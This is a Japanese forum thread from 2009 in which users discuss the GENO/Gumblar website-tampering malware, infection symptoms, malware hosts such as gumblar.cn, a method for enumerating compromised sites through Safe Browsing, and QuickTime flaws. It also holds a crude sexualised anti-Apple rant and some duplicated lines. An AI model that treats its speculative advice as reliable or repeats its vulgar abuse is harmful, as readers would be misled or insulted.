165 :192.168.0.774:2009/05/25(月) 22:08:06 ID:jKyVT4Df0
7つのNOだな
166 :192.168.0.774:2009/05/25(月) 22:14:53 ID:2+gm0oNq0
何やってんだGENOは・・・
167 :192.168.0.774:2009/05/25(月) 22:31:48 ID:73AdRoBk0
オレも他人のIDで出たぞ
アカ削除することもできねぇ
アカ削除することもできねぇ
168 :192.168.0.774:2009/05/25(月) 22:39:30 ID:ju8jdLa20
別種のウィルスに感染してたりしてな
ログインした人も軒並み感染とか・・・
だとしたら新GENOウィルスって名前になるのかなw
ログインした人も軒並み感染とか・・・
だとしたら新GENOウィルスって名前になるのかなw
169 :192.168.0.774:2009/05/25(月) 22:47:26 ID:1LBKGrg40
他人のIDとごっちゃとか半端ねぇww
170 :192.168.0.774:2009/05/25(月) 22:50:18 ID:c0a0QXT00
GENO第二章の始まりか?
それにしても他人の名前やらIDやらが出るってひでーな
それにしても他人の名前やらIDやらが出るってひでーな
171 :192.168.0.774:2009/05/25(月) 22:57:50 ID:R7WqhNJI0
これが別のウイルスのせいだったらGENOウイルスIIとかハイパーGENOウイルスとか
そんな名前にするの?
そんな名前にするの?
172 :192.168.0.774:2009/05/25(月) 23:00:27 ID:2XNmNZPd0
今回の問題に関するGENOの回答も期待できるのかなw
管理者がバカやらかした可能性もまたウイルスな可能性もあそこならありえる
管理者がバカやらかした可能性もまたウイルスな可能性もあそこならありえる
173 :192.168.0.774:2009/05/25(月) 23:03:51 ID:/SYvB9LI0
改ざんサイトをGoogleで簡単に発見可能なことが判ったのでメモ。
1. 任意のドメインをGoogleのセーフ ブラウジングで検索する。
例えば「google.com」なら、http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=ja&site=google.com
をブラウザで開く。
2. 表示された「Google セーフ ブラウジング診断ページ」で、
「This site was hosted on xx network(s) including」の後にあるリンク(上の場合、「AS15169 (GOOGLE)」)をクリック。
3. そのネットワーク内でホスティングされている改ざんサイトのURLが挙げられるので、リンクをクリック。
4. 「不正なソフトウェアは gumblar.cn/ を含む 1 個のドメインでホストされています。」といった文章があれば、gumblarスクリプトに改ざんされた可能性あり。
174 :192.168.0.774:2009/05/25(月) 23:04:38 ID:/SYvB9LI0
これをドメイン名を変えて総当たりでひたすら続けると、ぞろぞろ出てきます。
ちなみに検索するドメイン名は、「google.com」と「www.google.com」とでは検索結果が違うので注意。
「www.」なしで検索して「疑わしくない」という結果が出ても、「www.」などを付けると「疑わしいサイト」になったりします。
ちなみに検索するドメイン名は、「google.com」と「www.google.com」とでは検索結果が違うので注意。
「www.」なしで検索して「疑わしくない」という結果が出ても、「www.」などを付けると「疑わしいサイト」になったりします。
175 :192.168.0.774:2009/05/26(火) 03:39:47 ID:adE8bcIF0
>>174
お前にパソコン通信は無理
お前にパソコン通信は無理
176 :192.168.0.774:2009/05/26(火) 03:46:27 ID:/VVIOLJQ0
パソコン通信ワロタww
177 :192.168.0.774:2009/05/26(火) 04:22:39 ID:opExhozI0
パソ通の時代なんて知らんけどまずはニフティマネージャを(ry
178 :192.168.0.774:2009/05/26(火) 04:29:44 ID:0NS4XGEC0
新しいウィルスだったらNEOGEOウィルスで
179 :192.168.0.774:2009/05/26(火) 04:30:08 ID:/ktv3JuM0
このウイルスって感染すると専ブラの調子もおかしくなるのかな…
180 :192.168.0.774:2009/05/26(火) 04:45:10 ID:mifzxisU0
>>179
よほどのマシンパワーがないと全てがまともに動かん
よほどのマシンパワーがないと全てがまともに動かん
181 :192.168.0.774:2009/05/26(火) 04:48:59 ID:mifzxisU0
とか言ったけど上はVM上の話な
普通気がつくレベルと思うけど
普通気がつくレベルと思うけど
182 :192.168.0.774:2009/05/26(火) 04:53:06 ID:/ktv3JuM0
そっか…ありがとう
chmファイルは異常ないみたいなんだけども
何故かいくつかのスレが表示がおかしくなるんだけどそっちは別の原因があるのか
chmファイルは異常ないみたいなんだけども
何故かいくつかのスレが表示がおかしくなるんだけどそっちは別の原因があるのか
183 :192.168.0.774:2009/05/26(火) 08:57:00 ID:xUEn5PcS0
184 :192.168.0.774:2009/05/26(火) 09:40:42 ID:NRkVzeKAO
>>183は踏みすぎwww
185 :192.168.0.774:2009/05/26(火) 10:50:49 ID:ti9+LTirO
快感になるワロタ
だが分からんでもない
だが分からんでもない
186 :192.168.0.774:2009/05/26(火) 11:32:19 ID:Z2FeIoNLP
WindowsもLinuxみたいにバッチファイルひとつで、
クリーンインストール後の設定とアプリインストールとアップデートがワンタッチでできればいいのにね。
ドライバ、アップデート、必要なアプリインストールとか環境整えるのが面倒すぎる。
クリーンインストール後の設定とアプリインストールとアップデートがワンタッチでできればいいのにね。
ドライバ、アップデート、必要なアプリインストールとか環境整えるのが面倒すぎる。
187 :192.168.0.774:2009/05/26(火) 11:57:33 ID:Au+8+Nsd0
Windows 7でそういう機能を搭載するのかと思ったけど違うみたいだしね
188 :192.168.0.774:2009/05/26(火) 11:57:48 ID:MO01MAyz0
企業向けには避けて通れない機能で、msbatch.inf とかAIK とかあるわけだが、
そのスクリプトを書くのがけっこう面倒だったりする
再インスコしたら、切る(start=demand も含む)サービスの一覧だけは、
毎度面倒なわりに、バッチを書くのが簡単なので、バッチにしておいてある
あとは砂箱か
そのスクリプトを書くのがけっこう面倒だったりする
再インスコしたら、切る(start=demand も含む)サービスの一覧だけは、
毎度面倒なわりに、バッチを書くのが簡単なので、バッチにしておいてある
あとは砂箱か
189 :192.168.0.774:2009/05/26(火) 11:58:26 ID:R/KlVnzg0
>>182
ノートントラップみたいにAvastトラップがあるからなw
ノートントラップみたいにAvastトラップがあるからなw
190 :192.168.0.774:2009/05/26(火) 12:04:04 ID:Au+8+Nsd0
>>188
ありがとう
ありがとう
191 :192.168.0.774:2009/05/26(火) 12:16:02 ID:ZHtkN1G7O
ブログの、記事じゃなくてコメントを開いてから、パソコンの調子がおかしくなったんだけど
普通コメントに書き込んでウイルス撒くなんてのは出来ないですよね?
ウイルスとは関係ないのかな…
普通コメントに書き込んでウイルス撒くなんてのは出来ないですよね?
ウイルスとは関係ないのかな…
192 :192.168.0.774:2009/05/26(火) 12:31:27 ID:l/mq9I5TP
193 :192.168.0.774:2009/05/26(火) 13:30:59 ID:0mP/syHF0
感染サイトリストの紹介文のところのURL、なんで踏めるようにしちゃったんだろう
194 :192.168.0.774:2009/05/26(火) 13:43:09 ID:IhQBcdl+0
>>189
avast!だが別におかしくならないぞ?
avast!だが別におかしくならないぞ?
195 :192.168.0.774:2009/05/26(火) 14:02:41 ID:bEUyE4rkP
>>179
俺はavast使い始めた時にちょっとおかしくなった
具体的には明らかに>>200までしか進んでないのに、>>800宛のレスが当然のように(しかも複数)使われてたり。
まぁスレにウィルスのコードか何かが張られてて、それを察知したavastたんがスレの大部分を隔離してただけだったんだが。
俺はavast使い始めた時にちょっとおかしくなった
具体的には明らかに>>200までしか進んでないのに、>>800宛のレスが当然のように(しかも複数)使われてたり。
まぁスレにウィルスのコードか何かが張られてて、それを察知したavastたんがスレの大部分を隔離してただけだったんだが。
196 :192.168.0.774:2009/05/26(火) 14:05:44 ID:g4Ut+ZKA0
datぶっ壊れたらそうなるよ
>>192
ありがとうございます!
今確認してみたら、そのファイルも50,727バイトだったし、レジストリエディタも立ち上がった…
よかった!
ただ、IEが妙に終了したりするようになったのが気になるな…
ありがとうございます!
今確認してみたら、そのファイルも50,727バイトだったし、レジストリエディタも立ち上がった…
よかった!
ただ、IEが妙に終了したりするようになったのが気になるな…
198 :192.168.0.774:2009/05/26(火) 15:27:40 ID:76kSxz87P
最近「IPアドレス取得中」と表示されます
環境は,XPSP3 YBB12Mで無線LAN接続しています
ここ最近、起動時にネットには接続できるのですが
アイコンが「IPアドレス取得中」の状態なんです
修復すると正常のアイコンに戻ります。
このウィルスに感染したんでしょうかね?
環境は,XPSP3 YBB12Mで無線LAN接続しています
ここ最近、起動時にネットには接続できるのですが
アイコンが「IPアドレス取得中」の状態なんです
修復すると正常のアイコンに戻ります。
このウィルスに感染したんでしょうかね?
199 :192.168.0.774:2009/05/26(火) 15:32:25 ID:3uBHEXNZO
200 :192.168.0.774:2009/05/26(火) 15:32:58 ID:/ktv3JuM0
201 :192.168.0.774:2009/05/26(火) 15:33:05 ID:Z2FeIoNLP
なんでもかんでもGENOのせいw
202 :192.168.0.774:2009/05/26(火) 15:36:26 ID:76kSxz87P
>199
>1は読んで対応済みです
>1は読んで対応済みです
203 :192.168.0.774:2009/05/26(火) 15:38:45 ID:whX8t5/V0
204 :192.168.0.774:2009/05/26(火) 15:49:07 ID:l/mq9I5TP
205 :192.168.0.774:2009/05/26(火) 16:32:20 ID:AzhiVy6U0
206 :192.168.0.774:2009/05/26(火) 16:56:24 ID:3uBHEXNZO
207 :192.168.0.774:2009/05/26(火) 17:05:14 ID:xUEn5PcS0
つかこれ釣りじゃね?
208 :192.168.0.774:2009/05/26(火) 18:35:15 ID:R/KlVnzg0
>>198
お前の環境が悪いだけ。有線で繋いどけ。
お前の環境が悪いだけ。有線で繋いどけ。
209 :192.168.0.774:2009/05/26(火) 20:16:30 ID:jrdNXPLC0
前スレ?かな、次はQuickTimeとか狙われるかも
みたいなレスがあったと思ったけど
こんなことになったぜ・・・
http://www.forest.impress.co.jp/article/2009/05/26/quicktimevulner.html
みたいなレスがあったと思ったけど
こんなことになったぜ・・・
http://www.forest.impress.co.jp/article/2009/05/26/quicktimevulner.html
210 :192.168.0.774:2009/05/26(火) 21:50:53 ID:MO01MAyz0
211 :192.168.0.774:2009/05/26(火) 22:15:34 ID:2djNJEe50
firefoxだとsafebrowsingに怒られちゃうな
212 :192.168.0.774:2009/05/26(火) 22:51:29 ID:q+URMcwD0
GenoVirus感染サイトリストのコメントのURLがリンクになってるんだけどいつからだろ?
これ間違って踏む人出そうで危ないような気がするんだが…。
これ間違って踏む人出そうで危ないような気がするんだが…。
213 :192.168.0.774:2009/05/26(火) 22:54:43 ID:zO7o4gpQ0
間違って踏む人なんかいるか?
それより、駆除できてるのに、いつまでもリストアップされてるサイトが気の毒。
それより、駆除できてるのに、いつまでもリストアップされてるサイトが気の毒。
214 :192.168.0.774:2009/05/26(火) 23:53:25 ID:7dDKXeJO0
駆除しても告知しなきゃ意味ないだろ
気の毒も何もあったもんじゃない
これじゃ元々感染してないのか駆除済みなのかわからん
気の毒も何もあったもんじゃない
これじゃ元々感染してないのか駆除済みなのかわからん
215 :192.168.0.774:2009/05/27(水) 00:22:48 ID:Q9qE4kHO0
それはうp主に言ってるの?
感染サイトに言ってるの?
感染サイトに言ってるの?
216 :192.168.0.774:2009/05/27(水) 00:26:07 ID:Zw9diHMU0
サイトとかページに対して「感染」とか「駆除」とか言うと
あたかもウイルスの実体がサイト自体、ページ自体にあるかのように
誤解する人が出る
あたかもウイルスの実体がサイト自体、ページ自体にあるかのように
誤解する人が出る
217 :192.168.0.774:2009/05/27(水) 00:44:02 ID:DS7RW+Eb0
感染サイト、今リロッたらたらリンクなしになってた
ところでpass入れても記事削除できないんだが自分だけか?
同じ記事を2重に書いてしまい、ひとつは消せたから、pass間違いはないはず。
同じ不具合?があるなら、
上げた人が誤報告や対策済みと確認したところで、修正できないわけだが…
ところでpass入れても記事削除できないんだが自分だけか?
同じ記事を2重に書いてしまい、ひとつは消せたから、pass間違いはないはず。
同じ不具合?があるなら、
上げた人が誤報告や対策済みと確認したところで、修正できないわけだが…
218 :192.168.0.774:2009/05/27(水) 00:45:32 ID:Q9qE4kHO0
あー、それはあるかもな。
厳密には「管理者のPCがトロイの木馬型ウイルスに感染したために不正に改竄されたサイトリスト」・・・・・・て長いよっ。
厳密には「管理者のPCがトロイの木馬型ウイルスに感染したために不正に改竄されたサイトリスト」・・・・・・て長いよっ。
219 :192.168.0.774:2009/05/27(水) 00:56:26 ID:SmAh1nJS0
なんか次はQuickTimeの脆弱性が突かれそうだな。
毎度のごとくパッチが用意される前にアドバイザリが公開され、
ゼロデイ状態になってるから、Adobeよりも狙い目なんじゃ
ないか?
毎度のごとくパッチが用意される前にアドバイザリが公開され、
ゼロデイ状態になってるから、Adobeよりも狙い目なんじゃ
ないか?
220 :192.168.0.774:2009/05/27(水) 02:57:28 ID:NCsP4Es70
221 :192.168.0.774:2009/05/27(水) 05:42:48 ID:aSvBKq6i0
うっしゃ自分もいれてない。
あれ、ことあるごとにインスコされようとするからウザいんだよなぁ
あれ、ことあるごとにインスコされようとするからウザいんだよなぁ
222 :192.168.0.774:2009/05/27(水) 10:38:07 ID:mqE4guJk0
XSS対策されてないblogとかのwebサービスは、
投稿者がスクリプト投稿したら閲覧者が感染するよ
今はmartuz止まってるみたいだから、martuz以外から実体拾うようにしないと無理だけど。
投稿者がスクリプト投稿したら閲覧者が感染するよ
今はmartuz止まってるみたいだから、martuz以外から実体拾うようにしないと無理だけど。
223 :sage:2009/05/27(水) 11:07:25 ID:+948GCw/0
>>148、すみません。全然、理解していませんでした。こうでしょうか?
Firefox用プラグイン Shockwave Flash―――――――Flash Player
Shockwave for Director―――-Shockwave Player
IE用 ActiveX Shockwave Flash Object―――-Flash Player
Shockwave ActiveX Control――Shockwave Player
でも、自分は、まだFlashとShockwaveの違いも よく分かってませんが、
ほんと難しいなと思いました。
Macromedia社やDirectorなどの成り立ちから、通常 呼び分けていた流れと、
機能面からか、それぞれ製作側、閲覧側のツールとして捉える向きと
Web上に混在していて、時系列を把握していないと、一概には咀嚼できないんですね。
この認識も、ものすごく浅いところでは、という注釈つきでもダメかもしれませんし……。
とにかく自分は Flashの歴史について無知すぎた。
アドオン、プラグイン、ActiveXコントロールなどの
拡張パックの語彙・用法に関してもAboutすぎました。
Firefox用プラグイン Shockwave Flash―――――――Flash Player
Shockwave for Director―――-Shockwave Player
IE用 ActiveX Shockwave Flash Object―――-Flash Player
Shockwave ActiveX Control――Shockwave Player
でも、自分は、まだFlashとShockwaveの違いも よく分かってませんが、
ほんと難しいなと思いました。
Macromedia社やDirectorなどの成り立ちから、通常 呼び分けていた流れと、
機能面からか、それぞれ製作側、閲覧側のツールとして捉える向きと
Web上に混在していて、時系列を把握していないと、一概には咀嚼できないんですね。
この認識も、ものすごく浅いところでは、という注釈つきでもダメかもしれませんし……。
とにかく自分は Flashの歴史について無知すぎた。
アドオン、プラグイン、ActiveXコントロールなどの
拡張パックの語彙・用法に関してもAboutすぎました。
224 :192.168.0.774:2009/05/27(水) 11:15:10 ID:H/k8FWrU0
>>219
QuickTimeに限らず、昔からApple製のソフトは極め付けに行儀が悪く、
汚れた手で全身を撫で回されるような気持ち悪さがあるから常識のある奴は使わない。
感染するのはiPhoneやiPodみたいなアイテムを使ってる変態共だけだろ。
QuickTimeに限らず、昔からApple製のソフトは極め付けに行儀が悪く、
汚れた手で全身を撫で回されるような気持ち悪さがあるから常識のある奴は使わない。
感染するのはiPhoneやiPodみたいなアイテムを使ってる変態共だけだろ。
225 :192.168.0.774:2009/05/27(水) 11:41:56 ID:cNx9FNpE0
>>223
日本語でおk
日本語でおk
226 :192.168.0.774:2009/05/27(水) 11:42:07 ID:Lh6wq4Ey0
確かに入れてるだけでしぶとくしつこくスタートアップに居座ろうとするQuickTimeは、難儀な存在だな。
iTunesとがんじがらめにしてるところもあざとい。
iTunesとがんじがらめにしてるところもあざとい。
227 :192.168.0.774:2009/05/27(水) 11:54:47 ID:5HmcqpnuP
iTunesとかQuickTimeはMACで使うもの。Windowosには入れてない。
228 :192.168.0.774:2009/05/27(水) 11:59:32 ID:zItNA/Lv0
amazon危険度92%って微妙すぎて怖い
229 :192.168.0.774:2009/05/27(水) 12:02:47 ID:dxmZredg0
携帯用に変換するためだけに入れてるけど、そんなに行儀悪いのか?
年に数回しかつかわないし、iPodは持ってない・・・
年に数回しかつかわないし、iPodは持ってない・・・
230 :192.168.0.774:2009/05/27(水) 12:11:01 ID:KFsQLuii0
俺はゆるいあぽー信者だが、環境維持という観点では、
耐えられないって意見が出てくるのもしゃーない挙動はちょくちょくあるね
最近では、勝手にSafariダウソとか 信者から見てもありゃやりすぎだw
例によって、砂箱にほうり込んでおけばおk
耐えられないって意見が出てくるのもしゃーない挙動はちょくちょくあるね
最近では、勝手にSafariダウソとか 信者から見てもありゃやりすぎだw
例によって、砂箱にほうり込んでおけばおk
231 :192.168.0.774:2009/05/27(水) 12:32:52 ID:tYvKSspx0
>>229
俺も変換君のためだけに入れてる
俺も変換君のためだけに入れてる
232 :192.168.0.774:2009/05/27(水) 12:52:51 ID:0KD43PY10
233 :192.168.0.774:2009/05/27(水) 13:29:48 ID:aSvBKq6i0
これ思い出した。
iTunesが おきあがり
なかまに なりたそうに こちらをみている!
なまかに してあげますか?
>はい
iTunesが なかまに くわわった!
QuickTimeが なかまに くわわった!
Bonjour for Windowsが なかまに くわわった!
iTunesが おきあがり
なかまに なりたそうに こちらをみている!
なまかに してあげますか?
>はい
iTunesが なかまに くわわった!
QuickTimeが なかまに くわわった!
Bonjour for Windowsが なかまに くわわった!
234 :192.168.0.774:2009/05/27(水) 13:36:09 ID:6IjdJuck0
235 :192.168.0.774:2009/05/27(水) 13:48:08 ID:H/k8FWrU0
Apple製品を使うってことはApple様に向かって股を開いて
「私はApple様の従順な奴隷ですから思う存分ファックしてください」と宣言するようなもの
そんな連中はウイルスに感染しても別に普段と変わらないと思うよ
ファックするのがApple様じゃなくて得体の知れないウイルスに代わるだけだしな
俺たちはそんな連中に近寄りたくないだけで
「私はApple様の従順な奴隷ですから思う存分ファックしてください」と宣言するようなもの
そんな連中はウイルスに感染しても別に普段と変わらないと思うよ
ファックするのがApple様じゃなくて得体の知れないウイルスに代わるだけだしな
俺たちはそんな連中に近寄りたくないだけで
236 :192.168.0.774:2009/05/27(水) 14:15:12 ID:p3rI2ovh0
最新
Flash Player 10.0.22.87
Adobe Reader 9.1.1
まだ↑これが最新だよね?
Flash Player 10.0.22.87
Adobe Reader 9.1.1
まだ↑これが最新だよね?
237 :192.168.0.774:2009/05/27(水) 14:21:44 ID:pn6iaSeA0
ここはいつからアポースレになった?
238 :192.168.0.774:2009/05/27(水) 14:52:04 ID:n6+UUmaxP
QuickTimeなんてイラネだろ
239 :192.168.0.774:2009/05/27(水) 14:56:15 ID:dxmZredg0
いらないんだけど変換君便利なんだよな・・・
240 :192.168.0.774:2009/05/27(水) 14:58:23 ID:DMxSQASUO
林檎信者も林檎アンチもゴミ、つまり>>235もゴミ
241 :192.168.0.774:2009/05/27(水) 15:06:57 ID:7U85I7ws0
何を使おうが、
適切に選んでるか、使いこなしてるか、管理できてるか、
が問題であってだな・・・
面倒な上、馬鹿馬鹿しいので止めた
適切に選んでるか、使いこなしてるか、管理できてるか、
が問題であってだな・・・
面倒な上、馬鹿馬鹿しいので止めた
242 :192.168.0.774:2009/05/27(水) 15:17:28 ID:KFsQLuii0
スレ的には、Flash/Acrobatの穴がだいぶふさがったら、
いずれ順番で、QTの脆弱性も突かれるのかもな
ただ、Flash/Acrobatと違って、業務機よりホーム機に入ってる方が多そうだから、
攻撃者にとって「おいしい」かどうかは、攻撃者のターゲット範囲によってくるか
いずれ順番で、QTの脆弱性も突かれるのかもな
ただ、Flash/Acrobatと違って、業務機よりホーム機に入ってる方が多そうだから、
攻撃者にとって「おいしい」かどうかは、攻撃者のターゲット範囲によってくるか
243 :192.168.0.774:2009/05/27(水) 15:17:32 ID:0KD43PY10
変な奴に触ってしまったえんがちょえんがちょ
244 :192.168.0.774:2009/05/27(水) 18:53:55 ID:LtJky3Fi0
QuickTimeは勝手に自分を標準プレイヤーにしたり
ブラウザ上で開くだけでスタートアップに登録したりと困りもの
で、QuickTimeの挙動がウザイ、でも変換君は使いたい
って人はQuickTime Alternativeがおすすめ
ただ変換君が使えるバージョンが入手かわからんが
ブラウザ上で開くだけでスタートアップに登録したりと困りもの
で、QuickTimeの挙動がウザイ、でも変換君は使いたい
って人はQuickTime Alternativeがおすすめ
ただ変換君が使えるバージョンが入手かわからんが
245 :192.168.0.774:2009/05/27(水) 19:11:14 ID:LoTgBZbR0
246 :192.168.0.774:2009/05/27(水) 19:53:39 ID:7RRpVkld0
247 :192.168.0.774:2009/05/27(水) 20:09:22 ID:cL+kp0Pk0
>>233
あるあるすぎて困る
あるあるすぎて困る
248 :192.168.0.774:2009/05/28(木) 00:46:33 ID:6Q6FXXKz0
しかしすっかり落ち着いた流れになったけど
皆どうしてるんだろう
皆どうしてるんだろう
249 :192.168.0.774:2009/05/28(木) 00:49:47 ID:UQFqDqzO0
応急対策はできても、恒久対策ができてないからね
ウイルスが活発化しなければ、このままフィードアウト何じゃないかな・・・
ウイルスが活発化しなければ、このままフィードアウト何じゃないかな・・・
250 :192.168.0.774:2009/05/28(木) 00:56:36 ID:XYDCILBX0
フィ…フィードアウト…
251 :192.168.0.774:2009/05/28(木) 00:57:59 ID:0cYThVoc0
なにそれこわい
252 :192.168.0.774:2009/05/28(木) 01:00:25 ID:UQFqDqzO0
未だに対応(駆除、消去)のソフト聞かないし・・・
遅いよね・・・
遅いよね・・・
253 :192.168.0.774:2009/05/28(木) 01:06:17 ID:ysEgixzlP
システムに不可逆な改変を加えるマルウェアに感染したら安全が確認されている
バックアップから書き戻すかOSの再インストールするしかない
バックアップから書き戻すかOSの再インストールするしかない
254 :192.168.0.774:2009/05/28(木) 01:30:38 ID:mVG3+O460
自分の興味はウイルスから不正改竄に移った。
zone-hとかizumino.jpを見て、日々こんなにハッキングが行われているのかと。
GENOでなくても、これじゃいつどこに新種のウイルスが仕込まれてもおかしくない罠。
zone-hとかizumino.jpを見て、日々こんなにハッキングが行われているのかと。
GENOでなくても、これじゃいつどこに新種のウイルスが仕込まれてもおかしくない罠。
255 :192.168.0.774:2009/05/28(木) 04:20:23 ID:lNaKdK5O0
海外の方だと、インターネットの経路上にパケットキャプチャが仕掛けられていることすらあるしな。
そこを流れた平文パスワード(pop3とかftpとかtelnetとか)はダダ漏れ
辞書によるID/PASS総当りも常套手段だし、最近は日本人の名前やアニメ・ゲームのキャラクタまで入ってる。
安易なID/PASS設定しておくと、いつのまにかログインされて使われているオチ
「誰かが守ってくれる」なんて思っていたらインターネットでは生き残れない。
そこを流れた平文パスワード(pop3とかftpとかtelnetとか)はダダ漏れ
辞書によるID/PASS総当りも常套手段だし、最近は日本人の名前やアニメ・ゲームのキャラクタまで入ってる。
安易なID/PASS設定しておくと、いつのまにかログインされて使われているオチ
「誰かが守ってくれる」なんて思っていたらインターネットでは生き残れない。
256 :192.168.0.774:2009/05/28(木) 05:46:40 ID:eSuKYW+W0
楽天がメールアドレス含む個人情報を「1件10円」でダウンロード販売していることが判明 ★2
http://tsushima.2ch.net/test/read.cgi/news/1243425827/
http://tsushima.2ch.net/test/read.cgi/news/1243425827/
257 :192.168.0.774:2009/05/28(木) 08:08:54 ID:7x2zaD760
>>256
GENOと関係なし。
GENOと関係なし。
258 :192.168.0.774:2009/05/28(木) 09:55:39 ID:j5JE7+Uz0
259 :192.168.0.774:2009/05/28(木) 12:14:11 ID:Mzk/ssdW0
わけのわからない串は、わけのわからないモノを取りに行くのにけっこう助かったり
マルウェア差し上げます。おひとりさま(1IP) 1日1回まで。みたいなとこ
martuzもそんなんじゃなかったっけか
ま、POSTにはつかわん 秘匿性は期待しとらん
マルウェア差し上げます。おひとりさま(1IP) 1日1回まで。みたいなとこ
martuzもそんなんじゃなかったっけか
ま、POSTにはつかわん 秘匿性は期待しとらん
260 :192.168.0.774:2009/05/28(木) 16:31:51 ID:bhK+RmSY0
新マルウエア「GENOウイルス」蔓延に注意
http://www.asahi.com/digital/digitre/TKY200905250299.html
ASAHIでも記事になったようだ。GENOは無料で広告できていいねぇwww
http://www.asahi.com/digital/digitre/TKY200905250299.html
ASAHIでも記事になったようだ。GENOは無料で広告できていいねぇwww
261 :192.168.0.774:2009/05/28(木) 16:53:51 ID:OoqSOCZLP
fc2やっと注意喚起のメール来たよ
262 :192.168.0.774:2009/05/28(木) 17:35:08 ID:Mzk/ssdW0
月曜にきてたか [feed] http://blog.fc2.com/info/?xml
旧パスワード一斉無効措置付きか なるほどなー
旧パスワード一斉無効措置付きか なるほどなー
263 :192.168.0.774:2009/05/28(木) 17:39:28 ID:GHs75aeF0
264 :192.168.0.774:2009/05/28(木) 17:59:56 ID:Q+qjDG1G0
265 :192.168.0.774:2009/05/28(木) 18:28:38 ID:pUjLwD3e0
UACがなんなのかわからないやつがいてびっくり
今回はGENOどうこうより
初心者レベルの内容も熟知してないことが脅威だったわ
今回はGENOどうこうより
初心者レベルの内容も熟知してないことが脅威だったわ
266 :192.168.0.774:2009/05/28(木) 18:56:31 ID:gkgYHsms0
誰も彼もがビスタ使ってるわけじゃないんだから
267 :192.168.0.774:2009/05/28(木) 20:32:46 ID:g4U0zyYz0
268 :192.168.0.774:2009/05/28(木) 20:35:08 ID:wffocc+90
いや嫌々ながら使ってると取れる
269 :192.168.0.774:2009/05/28(木) 21:06:24 ID:TxXedgLr0
倦厭じゃなくて敬遠じゃないの?っていう突っ込みはナシ?w
270 :192.168.0.774:2009/05/28(木) 21:17:34 ID:wD+USA9K0
271 :192.168.0.774:2009/05/28(木) 21:20:43 ID:7jbhXxMV0
亜種には対応していない
とも書いてあるけどな。一番はやったときに検体が提出されたものにはさすがに対応してるんじゃね?
試す気はないが。
とも書いてあるけどな。一番はやったときに検体が提出されたものにはさすがに対応してるんじゃね?
試す気はないが。
272 :192.168.0.774:2009/05/28(木) 22:08:31 ID:qnsFnw2TO
cmdでのサイズチェックは問題なし、regeditも動作確認した
でもインターネットがくそ重い、ブラウザ変えても改善しない、DL速度が10KB/secも出なくなった
これは感染したと見ていいのかな…
でもインターネットがくそ重い、ブラウザ変えても改善しない、DL速度が10KB/secも出なくなった
これは感染したと見ていいのかな…
273 :192.168.0.774:2009/05/28(木) 22:15:46 ID:wffocc+90
274 :192.168.0.774:2009/05/28(木) 22:24:27 ID:Oax7cXyu0
使ってるセキュリティソフトが2chのどこに行ってもJS Downloador検出してまじでびびった
アップデートしたら直ったけどまじで心臓に悪い
アップデートしたら直ったけどまじで心臓に悪い
275 :192.168.0.774:2009/05/29(金) 01:10:03 ID:piBcLweA0
自分は今日、ネットは普通に使ってるのに
Flashが何かわかってない人に出会った
Flashってなに?ってきかれて、まずどう返していいのか一瞬困ったw
知らなくても問題なく使えてしまうからだろうけど
Flashが何かわかってない人に出会った
Flashってなに?ってきかれて、まずどう返していいのか一瞬困ったw
知らなくても問題なく使えてしまうからだろうけど
276 :192.168.0.774:2009/05/29(金) 01:57:00 ID:vEUQiBSK0
Flashぐらいでびびるなよ
ファイアウォール知らないやつとかざらにいるぞ
ファイアウォール知らないやつとかざらにいるぞ
277 :192.168.0.774:2009/05/29(金) 02:37:36 ID:OlQbOmgA0
Flash知らないくらいなら普通にいるよ
そんくらいなら動画サイト見てるなら入ってるよで通じるし
いちいち言うほどのことじゃない
つーかそれをバカにしちゃうほうがアレだわ
そんくらいなら動画サイト見てるなら入ってるよで通じるし
いちいち言うほどのことじゃない
つーかそれをバカにしちゃうほうがアレだわ
278 :192.168.0.774:2009/05/29(金) 03:11:05 ID:ehBR5T6V0
今は、ADSL 12MB が、約2千円、プロバイダのメール無しで約1.5千円なのに、
Yahoo! BB が値下げしない悪徳業者だと気づかないで契約時のまま 4千円近く
払わされている無自覚の感染者が何百万人もいるほうが驚くな
年間2万4千円多く徴収されているのに気づかない人たちを救ってやってったら、
景気回復するんじゃないのw
468 名前: 非通知さん 投稿日: 2009/05/17(日) 14:20:19 ID:3bcz0igI0
【ソフトバンク】
ソフトバンクBB鰍フ総合ブロードバンドサービス「Yahoo! BB ADSL」における、当期末の累積接続回
線数は429 万9,000 回線、当第4四半期のユーザー支払いベースのARPU は4,262 円となりました。
Yahoo! BB が値下げしない悪徳業者だと気づかないで契約時のまま 4千円近く
払わされている無自覚の感染者が何百万人もいるほうが驚くな
年間2万4千円多く徴収されているのに気づかない人たちを救ってやってったら、
景気回復するんじゃないのw
468 名前: 非通知さん 投稿日: 2009/05/17(日) 14:20:19 ID:3bcz0igI0
【ソフトバンク】
ソフトバンクBB鰍フ総合ブロードバンドサービス「Yahoo! BB ADSL」における、当期末の累積接続回
線数は429 万9,000 回線、当第4四半期のユーザー支払いベースのARPU は4,262 円となりました。
279 :192.168.0.774:2009/05/29(金) 08:45:40 ID:JsHSZpr50
パソコンには詳しくないからよくわからないけど怖いですね〜
…って書いてるサイト運営者が一番嫌だ。
…って書いてるサイト運営者が一番嫌だ。
280 :192.168.0.774:2009/05/29(金) 08:47:11 ID:x3Y9c4A10
これのメール版があるんだね
(((((((( ;゚Д゚)))))))ガクガクブルブル
(((((((( ;゚Д゚)))))))ガクガクブルブル
281 :192.168.0.774:2009/05/29(金) 10:04:49 ID:4z/zw8YJ0
プリインストールで入れてるなら、更新についても責任持ってもらいたいもんだな
282 :192.168.0.774:2009/05/29(金) 10:55:56 ID:uOCaNFIZ0
283 :192.168.0.774:2009/05/29(金) 11:26:57 ID:BthGL6et0
>上司から、お前の存在自体がセキュリティホールだ!と言われようとも
ぐのーむさんこんなこと言われてるのか・・・
あの活動が何のために行われてるのか上司は考えたことがあるのか
ぐのーむさんこんなこと言われてるのか・・・
あの活動が何のために行われてるのか上司は考えたことがあるのか
284 :192.168.0.774:2009/05/29(金) 11:31:03 ID:lYJ/D9vX0
>>282
別に不思議でもないんでもないっしょ。
別に不思議でもないんでもないっしょ。
285 :192.168.0.774:2009/05/29(金) 17:06:05 ID:foH44K5U0
体験者に一度きいてみたいんだが、感染サイトを踏んだらまず何がおきるんだ
adobe関係のウィンドウが開いたりするわけ?
adobe関係のウィンドウが開いたりするわけ?
286 :192.168.0.774:2009/05/29(金) 18:01:38 ID:3HxQrXqXP
割れ目がじゅわっ〜となる
287 :192.168.0.774:2009/05/29(金) 19:08:55 ID:VI53AlJ90
